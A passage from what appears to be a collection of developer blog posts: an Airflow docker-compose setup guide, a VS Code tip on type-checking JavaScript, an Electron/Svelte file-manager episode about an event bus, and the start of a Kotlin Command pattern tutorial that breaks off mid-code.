* [Additional PIP requirements](#Additional-PIP-requirements)
* [How to build customize airflow image](#How-to-build-customize-airflow-image)
* [Persistent airflow log, dags, and plugins](#Persistent-airflow-log,-dags,-and-plugins)
* [Using git-sync to up-to-date DAGs](#Using-git-sync-to-up-to-date-DAGs)
* [How to run](#How-to-run)
* [Add airflow connectors](#Add-airflow-connectors)
* [Understand airflow parameters in airflow.models](#Understand-airflow-parameters-in-airflow.models)
---
## 🚀 **Introduction** <a name="Introduction"></a>
The docker-compose.yaml contains several service definitions:
- airflow-scheduler - The scheduler monitors all tasks and DAGs, then triggers the task instances once their dependencies are complete.
- airflow-webserver - The webserver available at http://localhost:8080.
- airflow-worker - The worker that executes the tasks given by the scheduler.
- airflow-init - The initialization service.
- flower - The flower app for monitoring the environment. It is available at http://localhost:5555.
- postgres - The database.
- redis - The redis - broker that forwards messages from scheduler to worker.
Some directories in the container are mounted, which means that their contents are synchronized between the services and persisted.
- ./dags - you can put your DAG files here.
- ./logs - contains logs from task execution and scheduler.
- ./plugins - you can put your custom plugins here.
## 🚀 **Additional PIP requirements** <a name="Additional-PIP-requirements"></a>
- The airflow image contains most of the PIP packages needed for operation, but we still need to install extra packages such as clickhouse-driver, pandahouse and apache-airflow-providers-slack.
- Airflow 2.1.1 and later supports the `_PIP_ADDITIONAL_REQUIREMENTS` environment variable for installing additional requirements when starting the containers
```
_PIP_ADDITIONAL_REQUIREMENTS: 'pandahouse==0.2.7 clickhouse-driver==0.2.1 apache-airflow-providers-slack'
```
- It's not recommended to use this approach in production; instead, we should build our own image containing all the necessary pip packages and push it to AWS ECR
## 🚀 How to build customize airflow image <a name="How-to-build-customize-airflow-image"></a>
- Build own image.
- `requirements.txt`
```
pandahouse
clickhouse-driver
```
- `Dockerfile`
```
FROM apache/airflow:2.1.2-python3.9
COPY requirements.txt .
RUN pip install -r requirements.txt
```
- `docker build -t my-airflow .`
## 🚀 Persistent airflow log, dags, and plugins <a name="Persistent-airflow-log,-dags,-and-plugins"></a>
Not only persist the folders but also share them between the scheduler, worker and web-server
```
volumes:
- /mnt/airflow/dags:/opt/airflow/dags
- /mnt/airflow/logs:/opt/airflow/logs
- /mnt/airflow/plugins:/opt/airflow/plugins
- /mnt/airflow/data:/opt/airflow/data
```
## 🚀 Using git-sync to up-to-date DAGs <a name="Using-git-sync-to-up-to-date-DAGs"></a>
- The git-sync service polls the registered repository (every 60 seconds here, per `GIT_SYNC_WAIT`) and clones new commits into /dags
- We use the HTTP method and an access token to give the container permission
```
af-gitsync:
container_name: af-gitsync
image: k8s.gcr.io/git-sync/git-sync:v3.2.2
environment:
- GIT_SYNC_REV=HEAD
- GIT_SYNC_DEPTH=1
- GIT_SYNC_USERNAME=airflow
- GIT_SYNC_MAX_FAILURES=0
- GIT_KNOWN_HOSTS=false
- GIT_SYNC_DEST=repo
- GIT_SYNC_REPO=https://cloudopz.co/devops/airflow-dags.git
- GIT_SYNC_WAIT=60
- GIT_SYNC_TIMEOUT=120
- GIT_SYNC_ADD_USER=true
- GIT_SYNC_PASSWORD=
- GIT_SYNC_ROOT=/dags
- GIT_SYNC_BRANCH=master
volumes:
- /mnt/airflow/dags:/dags
```
## 🚀 How to run <a name="How-to-run"></a>
1. **Initializing Environment**
```
mkdir ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)\nAIRFLOW_GID=0" > .env
```
2. **Prepare `docker-compose.yaml`**
<details>
<summary>docker-compose.yaml</summary>
```
version: '3.5'
x-airflow-common:
&airflow-common
image: apache/airflow:2.1.2-python3.9
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@af-pg/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@af-pg/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@af-redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
AIRFLOW_CONN_RDB_CONN: 'postgresql://dbapplication_user:dbapplication_user@rdb:5432/postgres'
_PIP_ADDITIONAL_REQUIREMENTS: 'pandahouse==0.2.7 clickhouse-driver==0.2.1 apache-airflow-providers-slack'
volumes:
- /mnt/airflow/dags:/opt/airflow/dags
- /mnt/airflow/logs:/opt/airflow/logs
- /mnt/airflow/plugins:/opt/airflow/plugins
- /mnt/airflow/data:/opt/airflow/data
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
depends_on:
- af-redis
- af-pg
services:
af-pg:
image: postgres:13
container_name: af-pg
environment:
POSTGRES_USER: airflow
POSTGRES_PASSWORD: airflow
POSTGRES_DB: airflow
volumes:
- postgres-db-volume:/var/lib/postgresql/data
healthcheck:
test: ["CMD", "pg_isready", "-U", "airflow"]
interval: 5s
retries: 5
restart: always
af-redis:
container_name: af-redis
image: redis:latest
ports:
- 6379:6379
healthcheck:
test: ["CMD", "redis-cli", "ping"]
interval: 5s
timeout: 30s
retries: 50
restart: always
af-websrv:
container_name: af-websrv
<<: *airflow-common
command: webserver
ports:
- 28080:8080
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:8080/health"]
interval: 10s
timeout: 10s
retries: 5
restart: always
af-sch:
container_name: af-sch
<<: *airflow-common
command: scheduler
healthcheck:
test: ["CMD-SHELL", 'airflow jobs check --job-type SchedulerJob --hostname "$${HOSTNAME}"']
interval: 10s
timeout: 10s
retries: 5
restart: always
af-w:
container_name: af-w
<<: *airflow-common
command: celery worker
healthcheck:
test:
- "CMD-SHELL"
- 'celery --app airflow.executors.celery_executor.app inspect ping -d "celery@$${HOSTNAME}"'
interval: 10s
timeout: 10s
retries: 5
restart: always
af-int:
container_name: af-int
<<: *airflow-common
command: version
environment:
<<: *airflow-common-env
_AIRFLOW_DB_UPGRADE: 'true'
_AIRFLOW_WWW_USER_CREATE: 'true'
af-flower:
container_name: af-flower
<<: *airflow-common
command: celery flower
ports:
- 5555:5555
healthcheck:
test: ["CMD", "curl", "--fail", "http://localhost:5555/"]
interval: 10s
timeout: 10s
retries: 5
restart: always
af-gitsync:
container_name: af-gitsync
image: k8s.gcr.io/git-sync/git-sync:v3.2.2
environment:
- GIT_SYNC_REV=HEAD
- GIT_SYNC_DEPTH=1
- GIT_SYNC_USERNAME=airflow
- GIT_SYNC_MAX_FAILURES=0
- GIT_KNOWN_HOSTS=false
- GIT_SYNC_DEST=repo
- GIT_SYNC_REPO=https://cloudopz.co/devops/airflow-dags.git
- GIT_SYNC_WAIT=60
- GIT_SYNC_TIMEOUT=120
- GIT_SYNC_ADD_USER=true
- GIT_SYNC_PASSWORD=
- GIT_SYNC_ROOT=/dags
- GIT_SYNC_BRANCH=master
volumes:
- /mnt/airflow/dags:/dags
volumes:
postgres-db-volume:
```
</details>
3. **Run the init service (`af-int` in this compose file) to set up the airflow database**
```
docker-compose up af-int
```
- Then start all airflow services
```
docker-compose up -d
```
- Read more [Extension fields](https://docs.docker.com/compose/compose-file/compose-file-v3/#extension-fields) to understand docker-compose.yaml contents
## 🚀 Add airflow connectors <a name="Add-airflow-connectors"></a>
- Add slack connection
```
airflow connections add 'airflow-slack' \
    --conn-type 'http' \
--conn-password '/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' \
--conn-host 'https://hooks.slack.com/services'
```
- We can also add the connection in the UI
<p align="left">
<a href="https://dev.to/vumdao">
<img alt="Airflow Quick Start With docker-compose on AWS EC2" src="https://github.com/vumdao/airflow-docker/blob/master/slack-connection.png?raw=true" width="800" />
</a>
</p>
- We can also add connections through environment variables, e.g. in the docker-compose `environment` section
```
AIRFLOW_CONN_MY_POSTGRES_CONN: 'postgresql://airflow:airflow@postgres-pg:5432/airflow'
AIRFLOW_CONN_AIRFLOW_SLACK_CONN: 'https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX'
```
## 🚀 Understand airflow parameters in airflow.models <a name="Understand-airflow-parameters-in-airflow.models"></a>
- [airflow.models](https://airflow.apache.org/docs/apache-airflow/stable/_api/airflow/models/index.html)
- `Context`
- `on_failure_callback` (TaskStateChangeCallback) – a function to be called when a task instance of this task fails. a context dictionary is passed as a single parameter to this function. Context contains references to related objects to the task instance and is documented under the macros section of the API.
- `on_execute_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed right before the task is executed.
- `on_retry_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed when retries occur.
- `on_success_callback` (TaskStateChangeCallback) – much like the on_failure_callback except that it is executed when the task succeeds.
- `trigger_rule` (str) – defines the rule by which dependencies are applied for the task to get triggered. Options are: { all_success | all_failed | all_done | one_success | one_failed | none_failed | none_failed_or_skipped | none_skipped | dummy} default is all_success. Options can be set as string or using the constants defined in the static class airflow.utils.TriggerRule
---
{% user vumdao %}
{% github vumdao/vumdao no-readme %} | vumdao |
793,335 | VS Code - Get type checking in JavaScript easily | Did you know you can type check JavaScript code in VS Code? VS Code allows you to leverage some of... | 8,215 | 2021-08-16T08:18:24 | https://www.roboleary.net/2021/08/16/vscode-type-checking-for-javascript.html | webdev, javascript, tooling | Did you know you can type check JavaScript code in VS Code?
VS Code allows you to leverage some of TypeScript's advanced type checking and error reporting functionality in plain old JavaScript files. And you can even do some quick fixes! This can be done alongside ESLint without any issues.
The type checking is opt-in. You can apply it to an individual file, per project, or everywhere.
## Enable checking in individual files
If you want to try it out for a file, just add the comment `// @ts-check` to the top of a file. For example, the code below tries to multiply a number with a string.
```javascript
// @ts-check
let x = "blah";
let y = x * 2;
```
You will see red underlining under the offense to point out the error, and you will see the error in the problems tab.

## Enable checking in your workspace or everywhere
You can enable type checking for all JavaScript files with the `JS/TS › Implicit Project Config: Check JS` setting.
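If you prefer editing `settings.json` directly, the same option can be enabled there (the setting ID below matches the UI label; older VS Code releases used `javascript.implicitProjectConfig.checkJs`):

```json
{
  "js/ts.implicitProjectConfig.checkJs": true
}
```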
Alternatively, you can place a `jsconfig.json` in your root folder, and specify your [JavaScript project options](https://code.visualstudio.com/docs/languages/jsconfig). You can add type checking as a compiler option as below:
```json
{
"compilerOptions": {
"checkJs": true
},
"exclude": ["node_modules", "**/node_modules/*"]
}
```
The advantage of using `jsconfig.json` is that you can target the files you want checked through `include` and `exclude`.
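For example, a hypothetical `jsconfig.json` that checks only the files under a `src` folder could look like this:

```json
{
  "compilerOptions": {
    "checkJs": true
  },
  "include": ["src/**/*"],
  "exclude": ["node_modules", "**/node_modules/*"]
}
```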
You can use `// @ts-nocheck` to disable type checking inside a file if you want to make an exception also.
## Add extra type checking with JSDoc comments
[JSDoc](https://jsdoc.app/) annotations are used to describe your code and generate documentation. Part of that specification is adding types to variables; through this, we can get extra type checking in VS Code.
JSDoc annotations come before a declaration in a comment block. In the example below, I specify a type for the parameter and the return value.

You can see it catches a mistake when I provide a number as an argument in the function call `isHorizontalRule(1)`.
You can find the full list of supported JSDoc patterns in: [TypeScript Reference - JSDoc Supported Types](https://www.typescriptlang.org/docs/handbook/jsdoc-supported-types.html).
## Conclusion
Getting type checking in JavaScript is pretty sweet. It is simple and flexible to use. It provides some of the benefits of TypeScript without needing to convert a codebase to TypeScript.
Happy hacking!
| robole |
807,339 | Electron Adventures: Episode 36: File Manager Event Bus | It's time to bring what we learned into our app. The first step will be adding event bus from episode... | 14,346 | 2021-08-29T20:56:51 | https://dev.to/taw/electron-adventures-episode-36-file-manager-event-bus-g84 | javascript, electron, svelte | It's time to bring what we learned into our app. The first step will be adding event bus from episode 33 to file manager we last worked on in episode 32.
And while we're doing this, we'll also be refactoring the codebase.
### `src/EventBus.js`
We can setup event bus identical to what we already did.
I'm sort of considering adding some syntactic sugar support at some point so we can replace `eventBus.emit("app", "activatePanel", panelId)` by `eventBus.app.activatePanel(panelId)` using [`Proxy` objects](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Proxy). That would be super easy in Ruby, but a bit complex with JS.
```javascript
export default class EventBus {
constructor() {
this.callbacks = {}
}
handle(target, map) {
this.callbacks[target] = { ...(this.callbacks[target] || {}), ...map }
}
emit(target, event, ...details) {
let handlers = this.callbacks[target]
if (handlers) {
if (handlers[event]) {
handlers[event](...details)
} else if (handlers["*"]) {
handlers["*"](event, ...details)
}
}
}
}
```
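The sugar idea mentioned above could be sketched with nested `Proxy` objects. This is purely hypothetical (the `to` accessor name is my invention, not part of the app), reusing the class as defined:

```javascript
// Hypothetical sketch: bus.to.app.activatePanel("left") forwards to
// bus.emit("app", "activatePanel", "left").
class EventBus {
  constructor() { this.callbacks = {} }
  handle(target, map) {
    this.callbacks[target] = { ...(this.callbacks[target] || {}), ...map }
  }
  emit(target, event, ...details) {
    let handlers = this.callbacks[target]
    if (handlers) {
      if (handlers[event]) handlers[event](...details)
      else if (handlers["*"]) handlers["*"](event, ...details)
    }
  }
  get to() {
    // The first Proxy resolves the target name, the second resolves the
    // event name, and the returned function carries the arguments to emit().
    return new Proxy({}, {
      get: (_, target) => new Proxy({}, {
        get: (_, event) => (...details) => this.emit(target, event, ...details)
      })
    })
  }
}

let bus = new EventBus()
let log = []
bus.handle("app", { activatePanel: (id) => log.push(id) })
bus.to.app.activatePanel("left")
console.log(log) // [ 'left' ]
```

Whether the extra indirection is worth it over a plain `emit` call is debatable, but it does read closer to the Ruby-style API.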
### `src/commands.js`
Previously we had the list of commands copied and pasted multiple times between keyboard handler, application menu, and command palette. We don't have application menu and command palette yet, but we can preempt this issue by extracting it to a separate file.
```javascript
export default [
{key: "Tab", action: ["app", "switchPanel"]},
{key: "F10", action: ["app", "quit"]},
{key: "ArrowDown", action: ["activePanel", "nextItem"]},
{key: "ArrowUp", action: ["activePanel", "previousItem"]},
{key: "PageDown", action: ["activePanel", "pageDown"]},
{key: "PageUp", action: ["activePanel", "pageUp"]},
{key: "Home", action: ["activePanel", "firstItem"]},
{key: "End", action: ["activePanel", "lastItem"]},
{key: " ", action: ["activePanel", "flipItem"]},
{key: "Enter", action: ["activePanel", "activateItem"]},
]
```
### `src/Keyboard.svelte`
With event bus and commands list extracted, `Keyboard` component is very simple. We'll need to change it to support modifier keys like Cmd, and maybe to disable shortcuts when modal panels are open, but even then it will be very simple component.
```html
<script>
import commands from "./commands.js"
import { getContext } from "svelte"
let { eventBus } = getContext("app")
function handleKey(e) {
for (let command of commands) {
if (command.key === e.key) {
e.preventDefault()
eventBus.emit(...command.action)
}
}
}
</script>
<svelte:window on:keydown={handleKey} />
```
### `src/Footer.svelte`
The only change is using `eventBus` to tell the app to quit instead of handling that locally. As we're adding functionality, we'll be adding similar handlers to other buttons. Of course at some point we can go fancy, and make the footer context-aware.
```html
<script>
import { getContext } from "svelte"
let { eventBus } = getContext("app")
</script>
<footer>
<button>F1 Help</button>
<button>F2 Menu</button>
<button>F3 View</button>
<button>F4 Edit</button>
<button>F5 Copy</button>
<button>F6 Move</button>
<button>F7 Mkdir</button>
<button>F8 Delete</button>
<button on:click={() => eventBus.emit("app", "quit")}>F10 Quit</button>
</footer>
<svelte:window />
<style>
footer {
text-align: center;
grid-area: footer;
}
button {
font-family: inherit;
font-size: inherit;
background-color: #66b;
color: inherit;
}
</style>
```
### `src/App.svelte`
And the main component. First template and styling, very little changed, we just added `Keyboard` and got rid of some `Panel` props:
```html
<div class="ui">
<header>
File Manager
</header>
<Panel initialDirectory={initialDirectoryLeft} id="left" />
<Panel initialDirectory={initialDirectoryRight} id="right" />
<Footer />
</div>
<Keyboard />
<style>
:global(body) {
background-color: #226;
color: #fff;
font-family: monospace;
margin: 0;
font-size: 16px;
}
.ui {
width: 100vw;
height: 100vh;
display: grid;
grid-template-areas:
"header header"
"panel-left panel-right"
"footer footer";
grid-template-columns: 1fr 1fr;
grid-template-rows: auto minmax(0, 1fr) auto;
}
.ui header {
grid-area: header;
}
header {
font-size: 24px;
margin: 4px;
}
</style>
```
The script part does a bit more:
```html
<script>
import { writable } from "svelte/store"
import { setContext } from "svelte"
import Panel from "./Panel.svelte"
import Footer from "./Footer.svelte"
import EventBus from "./EventBus.js"
import Keyboard from "./Keyboard.svelte"
let eventBus = new EventBus()
let activePanel = writable("left")
setContext("app", {eventBus, activePanel})
let initialDirectoryLeft = window.api.currentDirectory()
let initialDirectoryRight = window.api.currentDirectory() + "/node_modules"
function switchPanel() {
if ($activePanel === "left") {
activePanel.set("right")
} else {
activePanel.set("left")
}
}
function activatePanel(panel) {
activePanel.set(panel)
}
function quit() {
window.close()
}
function emitToActivePanel(...args) {
eventBus.emit($activePanel, ...args)
}
eventBus.handle("app", {switchPanel, activatePanel, quit})
eventBus.handle("activePanel", {"*": emitToActivePanel})
</script>
```
We register three commands - `switchPanel`, `activatePanel`, and `quit`. We also setup forwarding of `activePanel` events to either `left` or `right` panel.
For context we expose just two things - `activePanel` and `eventBus`. And I'm not even sure about exposing `activePanel`. Right now passing `true`/`false` to each `Panel` would work just as well. I might revisit this later.
### `src/File.svelte`
`Panel` was already getting very complicated, so I started by extracting `File` component out of it. It represents a single entry in the panel.
```html
<div
class="file"
class:focused={focused}
class:selected={selected}
on:click|preventDefault={() => onclick()}
on:contextmenu|preventDefault={() => onrightclick()}
on:dblclick|preventDefault={() => ondoubleclick()}
bind:this={node}
>
{filySymbol(file)}{file.name}
</div>
<style>
.file {
cursor: pointer;
}
.file.selected {
color: #ff2;
font-weight: bold;
}
:global(.panel.active) .file.focused {
background-color: #66b;
}
</style>
```
There are two new things here. First is `bind:this={node}`. We expose `node` as a bindable property, so parent can access to our DOM node. This is generally not the best pattern, so maybe we can figure out something less intrusive later.
The other new thing is `:global(.panel.active) .file.focused` selector. Svelte selectors are all automatically rewritten to only match elements created by the current component - there's an extra class automatically added by every component, and `.file.selected` is actually `.createdByFileComponent.file.selected` (except it's a hash not `createdByFileComponent`).
This is what we want 90% of the time, but in this case we want a special styling rule based on which context the element is in. `.panel.active .file.focused` won't ever work as the `panel` wasn't created here. There are two ways to do this - either pass some props to the component describing the context (`export let inActivePanel` etc.), so styling can be self contained. Or use `:global(selector)` to disable this rule for just this one selector. Everything else in the styling is still component-scoped.
And now the code:
```html
<script>
import { getContext } from "svelte"
export let file
export let idx
export let panelId
export let focused
export let selected
export let node = undefined
let {eventBus} = getContext("app")
function onclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
}
function onrightclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
eventBus.emit(panelId, "flipSelected", idx)
}
function ondoubleclick() {
eventBus.emit("app", "activatePanel", panelId)
eventBus.emit(panelId, "focusOn", idx)
eventBus.emit(panelId, "activateItem")
}
function filySymbol(file) {
if (file.type === "directory") {
if (file.linkTarget) {
return "~"
} else {
return "/"
}
} else if (file.type === "special") {
return "-"
} else {
if (file.linkTarget) {
return "@"
} else {
return "\xA0" //
}
}
}
</script>
```
We handle all events locally, by translating them into a series of `app` and `panelId` events. I'm sort of wondering about using some `Proxy` objects so I could instead write it like this:
```javascript
function onclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
}
function onrightclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
eventBus[panelId].flipSelected(idx)
}
function ondoubleclick() {
eventBus.app.activatePanel(panelId)
eventBus[panelId].focusOn(idx)
eventBus[panelId].activateItem()
}
```
Or even:
```javascript
let app = eventBus.app
let panel = eventBus[panelId]
function onclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
}
function onrightclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
panel.flipSelected(idx)
}
function ondoubleclick() {
app.activatePanel(panelId)
panel.focusOn(idx)
panel.activateItem()
}
```
That would be nicer, right?
A minor thing to note is `export let node = undefined`. As `node` is export-only property we explicitly mark it as such to avoid warning in development mode. Other than that, it works the same as not having `= undefined`.
### `src/Panel.svelte`
`Panel` svelte got slimmed down thanks to some code moving down to `File` component. Let's start with template and styling:
```html
<div class="panel {id}" class:active={active}>
<header>{directory.split("/").slice(-1)[0]}</header>
<div class="file-list" bind:this={fileListNode}>
{#each files as file, idx}
<File
panelId={id}
file={file}
idx={idx}
focused={idx === focusedIdx}
selected={selected.includes(idx)}
bind:node={fileNodes[idx]}
/>
{/each}
</div>
</div>
<style>
.left {
grid-area: panel-left;
}
.right {
grid-area: panel-right;
}
.panel {
background: #338;
margin: 4px;
display: flex;
flex-direction: column;
}
header {
text-align: center;
font-weight: bold;
}
.file-list {
flex: 1;
overflow-y: scroll;
}
</style>
```
The only unusual thing is `bind:node={fileNodes[idx]}`. `File` component exports its main DOM node in `node` instance variable, and we then store it in `fileNodes[idx]`.
The script is fairly long, but it's basically what we already had before, except now we register various functions with `eventBus`:
```html
<script>
import File from "./File.svelte"
import { getContext, tick } from "svelte"
export let initialDirectory
export let id
let directory = initialDirectory
let initialFocus
let files = []
let selected = []
let focusedIdx = 0
let fileNodes = []
let fileListNode
let {eventBus, activePanel} = getContext("app")
$: active = ($activePanel === id)
$: filesPromise = window.api.directoryContents(directory)
$: filesPromise.then(x => {
files = x
selected = []
setInitialFocus()
})
$: filesCount = files.length
$: focused = files[focusedIdx]
let flipSelected = (idx) => {
if (selected.includes(idx)) {
selected = selected.filter(f => f !== idx)
} else {
selected = [...selected, idx]
}
}
let setInitialFocus = async () => {
focusedIdx = 0
if (initialFocus) {
focusedIdx = files.findIndex(x => x.name === initialFocus)
if (focusedIdx === -1) {
focusedIdx = 0
}
} else {
focusedIdx = 0
}
await tick()
scrollFocusedIntoView()
}
let scrollFocusedIntoView = () => {
if (fileNodes[focusedIdx]) {
fileNodes[focusedIdx].scrollIntoViewIfNeeded(true)
}
}
let focusOn = (idx) => {
focusedIdx = idx
if (focusedIdx > filesCount - 1) {
focusedIdx = filesCount - 1
}
if (focusedIdx < 0) {
focusedIdx = 0
}
scrollFocusedIntoView()
}
function pageSize() {
if (!fileNodes[0] || !fileNodes[1] || !fileListNode) {
return 16
}
let y0 = fileNodes[0].getBoundingClientRect().y
let y1 = fileNodes[1].getBoundingClientRect().y
let yh = fileListNode.getBoundingClientRect().height
return Math.floor(yh / (y1 - y0))
}
function activateItem() {
if (focused?.type === "directory") {
if (focused.name === "..") {
initialFocus = directory.split("/").slice(-1)[0]
directory = directory.split("/").slice(0, -1).join("/") || "/"
} else {
initialFocus = null
directory += "/" + focused.name
}
}
}
function nextItem() {
focusOn(focusedIdx + 1)
}
function previousItem() {
focusOn(focusedIdx - 1)
}
function pageDown() {
focusOn(focusedIdx + pageSize())
}
function pageUp() {
focusOn(focusedIdx - pageSize())
}
function firstItem() {
focusOn(0)
}
function lastItem() {
focusOn(filesCount - 1)
}
function flipItem() {
flipSelected(focusedIdx)
nextItem()
}
eventBus.handle(id, {nextItem, previousItem, pageDown, pageUp, firstItem, lastItem, flipItem, activateItem, focusOn, flipSelected, activateItem})
</script>
```
### Result

The next step is adding a command palette, hopefully looking a bit better than what we had last time.
As usual, [all the code for the episode is here](https://github.com/taw/electron-adventures/tree/master/episode-36-file-manager-event-bus).
*Author: taw*

---
title: Command Pattern in Kotlin
published: 2021-08-31
tags: kotlin, designpatterns, command, coroutines
canonical_url: https://asvid.github.io/kotlin-command-pattern
---

## Purpose
The Command pattern wraps the request into a specific object that has all the information necessary to perform its task. You can think of it as the next stage of refactoring, where at first we extract the code to a separate method, and then to a separate object, taking the arguments needed to execute the request in the constructor.
Since the request is an object, it can be sent to a separate object (a `CommandProcessor`) for execution, which allows queuing requests and makes logging events easy. The same command can be used in different places in the system, encapsulating the entire logic of the request execution, which prevents code duplication. It does not have to be the same instance every time; reusing the class is enough.
The request object, in addition to the standard `execute()` method, may contain a method like `undo()`, i.e. undoing the changes made by the request. Virtually all graphics programs or word processors have this option. They could be storing each change in the form of `Command` in some buffer with limited capacity (hence the possibility of e.g. only 3 undos), and if the user wants to undo the last change made, the`Command` is pulled from the buffer and the changes made by it are undone.
## Implementation
### Abstract
As already mentioned, by default the `Command` object has an `execute()` (or equivalent) method. There are several other classes in this pattern:
- **Receiver** - object used by the `Command` to complete its task. If the `Command` is to download the weather from the internet, the `Receiver` will be an HTTP client, for example. It can be any class in your system.
- **Invoker** - the class using the `Command`
- **Client** - creates the `ConcreteCommand` instance, binds it with the `Receiver`, and sets it in the `Invoker`
- **ConcreteCommand** - specific command. It has all the other objects needed to complete the task.
The order of interactions looks like this:

1. The `Client` creates the instance of the specific `Command`, passing the receiver `Receiver`.
2. `Invoker` gets a specific instance of the command.
3. The `Invoker` uses the `execute()` method of the command instance to do its own thing. For example, this could be to perform an action "on click" if `Invoker` is a UI button.
4. The `Command` calls the appropriate methods of its `Receiver`.
In such generic form it can be implemented like this:
```kotlin
// generic Command interface
// binding the Receiver class in the generic interface allows grouping commands in a way
// e.g. related to text editing, graphic editor or HTTP requests
// it's not required by the pattern itself
abstract class Command(val receiver: Receiver) {
abstract fun execute()
}
// concrete Command taking the Receiver in the constructor
class ConcreteCommand(receiver: Receiver) : Command(receiver) {
override fun execute() {
println("executing ConcreteCommand")
// calling action on the Receiver to perform a task
receiver.action()
}
}
// the "true" action performer, knowing implementation details
// e.g. text editor or HTTP client
class Receiver {
fun action() {
println("performing action in Receiver")
}
}
// class using the passed Command
// e.g. UI button calling Command when clicked
class Invoker {
private lateinit var aCommand: Command
fun setCommand(command: Command) {
aCommand = command
}
fun performAction() {
aCommand.execute()
}
}
// class connecting Receiver, Command and Invoker
class Client(invoker: Invoker) {
private val receiver = Receiver()
init {
// setting the Invoker command
val concreteCommand = ConcreteCommand(receiver)
invoker.setCommand(concreteCommand)
}
}
fun main() {
val invoker = Invoker()
Client(invoker)
invoker.performAction()
}
```
#### Return Result
The command may return some value. However, this will not always be a good practice. While returning `Success/Failure` will usually be OK to inform the calling class about the command execution status, returning some specific data conflicts with the `CQRS` - Command Query Responsibility Segregation - approach. The point is that a request either changes something (a command) or returns data (a query), never both.
Let's take this situation: you display a list of names, and each list item can be edited to change the name. A name change is encapsulated in a command that operates on some data repository. Should such a command return anything, and if so, what exactly? The whole list of names with the updated name? What if the list is paged; do you return just the page with the updated item, or the whole list of items up to this item? Or should the command return the changed name itself, so the `Invoker` has to update the displayed list? But then you have 2 representations of the names list: one in the repository and a second one in the view, even if the values are the same (but there is nothing to guarantee this).
It's better if the command returns a simple `Success`, which will cause the view to download the current list of names from the repository, or show an error message. Or better yet, the view could always keep its list up-to-date with the repository by some sort of `data-binding` or `Observer`. After executing the command, the list will update itself, and you don't even need to return any `Success/Failure` from the command, unless you need to handle the error.
Another way may be to pass some callback in the `execute()`, but maybe let's not go that way :)
```kotlin
// command result nicely fits with `sealed class`
sealed class CommandResult {
// returned values could be `object` if they don't contain any data
class Success : CommandResult()
class Fail : CommandResult()
}
// `interface` instead of `abstract class` this time, no forced `Receiver` type in the constructor
interface Command {
fun execute(): CommandResult
}
// `Receiver` appears just here
class ConcreteCommand(private val receiver: Receiver) : Command {
// executing the command returns a result
override fun execute(): CommandResult {
println("executing ConcreteCommand")
// that depends on Receiver response
return if (receiver.action()) {
CommandResult.Success()
} else {
CommandResult.Fail()
}
}
}
// `Receiver` that returns random Boolean
class Receiver {
fun action(): Boolean {
println("performing action in Receiver")
return Random.nextBoolean()
}
}
fun main() {
val receiver = Receiver()
// no `Invoker` in this example, invoking is simply in `main()`
val result = ConcreteCommand(receiver).execute()
println("Command result is: $result")
}
```
#### CommandProcessor
Closing the entire command in an object allows it to be passed to an external `Processor` instead of being executed immediately. The `Processor` can queue and execute commands according to its internal logic, but from the `Invoker`'s point of view, it doesn't really matter. The `Receiver` can be moved from the command to the `Processor`; thus the commands will only take their parameters, and the rest will be handled by the `Processor` when calling `execute()`.
However, make sure that the `execute()` method always has the same signature, and that you do not have to implement special handling inside the `Processor` depending on the type of the command. As long as `Command` and `Processor` are in the same domain (e.g. HTTP requests to a specific API, sending messages via Bluetooth), there should be no problems with that. If a given `Processor` needs to pass a different `Receiver` type when executing commands, it may suggest that they should go to a different `Processor`.
```kotlin
// util to generate random delays in suspended methods
fun randomDelay() = Random.nextLong(1000, 3000)
interface Command {
// Receiver is passed at the execute() call, not sooner
suspend fun execute(receiver: Receiver)
}
// commands take only parameters, without Receiver
class FirstCommand(private val param: Int) : Command {
override suspend fun execute(receiver: Receiver) {
println("executing FirstCommand $param")
receiver.action()
}
}
class SecondCommand(private val param: String) : Command {
override suspend fun execute(receiver: Receiver) {
println("executing SecondCommand $param")
receiver.action()
}
}
class Receiver {
// running Receivers action may take a while, thus `suspend` and `delay()` to mimic that
suspend fun action() {
println("performing action in Receiver")
delay(randomDelay())
println("action finished!")
}
}
// the most important class in this example
// it has the Receiver instance used by the commands
// commands are stored in FIFO queue in the form of `Channel`
object CommandProcessor {
private val commands = Channel<Command>()
// using separate Scopes for adding and executing commands prevents one from blocking the other
private val processScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val executeScope = CoroutineScope(Executors.newSingleThreadExecutor().asCoroutineDispatcher())
private val receiver = Receiver()
fun process(command: Command) {
processScope.launch {
println("adding $command to the queue")
commands.send(command)
}
}
init {
// waiting for new commands in the queue and executing them as soon as they come
executeScope.launch {
for (command in commands) {
command.execute(receiver)
}
}
}
}
// Invoker without changes
class Invoker {
private lateinit var aCommand: Command
fun setCommand(command: Command) {
aCommand = command
}
fun performAction() {
CommandProcessor.process(aCommand)
}
}
fun main() {
val firstInvoker = Invoker()
val secondInvoker = Invoker()
// no Receiver here, just command parameters
firstInvoker.setCommand(FirstCommand(1))
secondInvoker.setCommand(SecondCommand("2"))
// invoking actions 10x
